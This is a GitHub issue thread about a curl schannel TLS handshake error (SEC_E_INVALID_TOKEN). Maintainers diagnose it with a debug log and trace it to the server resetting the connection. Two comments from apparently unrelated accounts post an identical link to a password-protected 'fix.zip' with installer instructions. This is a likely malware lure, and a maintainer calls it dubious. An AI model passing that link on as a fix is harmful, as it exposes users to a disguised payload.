### ISSUE TITLE
curl: (35) schannel: next InitializeSecurityContext failed: SEC_E_INVALID_TOKEN (0x80090308) - The token supplied to the function is invalid

### ISSUE THREAD

**Issue by typeshi12** [curl/curl#14683]
### I did this

Hello,

I am a developer for a product that uses CPR to access various apis. However, a good sum of my users (not me, however) are encountering an issue accessing my website through CPR / cURL.

I set up some debug message boxes, and this is what it shows on two users:
![image](https://github.com/user-attachments/assets/a461c799-2e8c-417a-aaa6-214a05e06853)

This output indicates the cURL request was never sent. Now, I did file an Issue on CPR but, ultimately, this may be a cURL issue, as upon the users doing this action in cmd prompt:

`curl 'https://getsolara.dev/api/endpoint.json'`
They get this error:
`curl: (35) schannel: next InitializeSecurityContext failed: SEC_E_INVALID_TOKEN (0x80090308) - The token supplied to the function is invalid`

Now you may think this is an ISP or country block issue, however, I asked the users to access the endpoint in a browser without a vpn:

![image](https://github.com/user-attachments/assets/d7c7adb9-feca-4466-be0d-e424238e5770)
![image](https://github.com/user-attachments/assets/3ecb367d-a10f-4eb2-82db-1da1531e99e7)

and the information was available no problem.

### I expected the following

-

### curl/libcurl version

curl 8.8.0 (Windows) libcurl/8.8.0 Schannel zlib/1.3 WinIDN

### operating system

Windows 11, 10.0.22631 Build 22631

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bagder** [comment]
Two persons seemingly unrelated to the issue post the same dubious link to a random encrypted zip file with no explanation. Surely no sane person would execute that file on a real machine.

**Comment by bagder** [comment]
SEC_E_INVALID_TOKEN is documented [here](https://learn.microsoft.com/en-us/windows/win32/secauthn/initializesecuritycontext--schannel):

> The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong [constrained delegation](https://learn.microsoft.com/en-us/windows/win32/secgloss/s-gly). Passing a token to the wrong package can happen if the client and server did not negotiate the proper [constrained delegation](https://learn.microsoft.com/en-us/windows/win32/secgloss/s-gly).

I cannot see how curl can cause this by itself on some hosts.

**Comment by typeshi12** [comment]
> SEC_E_INVALID_TOKEN is documented [here](https://learn.microsoft.com/en-us/windows/win32/secauthn/initializesecuritycontext--schannel):
> 
> > The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong [constrained delegation](https://learn.microsoft.com/en-us/windows/win32/secgloss/s-gly). Passing a token to the wrong package can happen if the client and server did not negotiate the proper [constrained delegation](https://learn.microsoft.com/en-us/windows/win32/secgloss/s-gly).
> 
> I cannot see how curl can cause this by itself on some hosts.

Sorry, I do not know what to do with this information. I'm using cloudflare pages to serve content, and I didn't see any settings that would cause such issues. cURL is the only http client that this is happening on - the users can view it in their browser and, separately on another program using WebClient in C#, can get the information from the endpoint. It's literally only happening on cURL.

**Comment by jay** [comment]
I looked at this in Wireshark. When the request is sent from curl using Schannel in Windows 11 it sends the client hello as expected but the server replies with both a close notify and RST. In other words for me the server is closing the connection immediately:

`curld -v https://getsolara.dev/api/endpoint.json`
~~~
* !!! WARNING !!!
* This is a debug build of libcurl, do not use in production.
* STATE: INIT => CONNECT handle 0x1650068; line 1904
* Added connection 0. The cache now contains 1 members
* STATE: CONNECT => RESOLVING handle 0x1650068; line 1947
* Host getsolara.dev:443 was resolved.
* IPv6: (none)
* IPv4: 167.206.37.136
* STATE: RESOLVING => CONNECTING handle 0x1650068; line 2021
*   Trying 167.206.37.136:443...
* Connected to getsolara.dev (167.206.37.136) port 443
* schannel: SSL/TLS connection with getsolara.dev port 443 (step 1/3)
* Didn't find Session ID in cache for host HTTPS://getsolara.dev:443
* schannel: checking server certificate revocation
* schannel: disabled automatic use of client certificate
* schannel: sending initial handshake data: sending 277 bytes.
* schannel: sent initial handshake data: sent 277 bytes
* schannel: SSL/TLS connection with getsolara.dev port 443 (step 2/3)
* schannel: failed to receive handshake, need more data
* schannel: SSL/TLS connection with getsolara.dev port 443 (step 2/3)
* Recv failure: Connection was reset
* schannel: failed to receive handshake, SSL/TLS connection failed
* multi_done[CONNECTING]: status: 35 prem: 1 done: 0
* multi_done, not reusing connection=0, forbid=0, close=0, premature=1, conn_multiplex=0
* The cache now contains 0 members
* Curl_disconnect(conn #0, dead=1)
* Closing connection
* schannel: shutting down SSL/TLS connection with getsolara.dev port 443
* Send failure: Connection was reset
* schannel: failed to send close msg: Failed sending data to the peer (bytes written: -1)
* schannel: clear security context handle
curl: (35) Recv failure: Connection was reset
~~~

Microsoft Edge says "the connection was reset" before automatically retrying with some legacy protocols at which point it says "getsolara.dev sent an invalid response" ERR_SSL_PROTOCOL_ERROR

Check your cloudflare settings

**Comment by bagder** [comment]
Unfortunately we have not identified anything curl can do here to improve things.

I would perhaps consider a build using another TLS library to see if there are more details to learn to hopefully figure out what can be done to succeed.

This does not seem to be a curl issue.
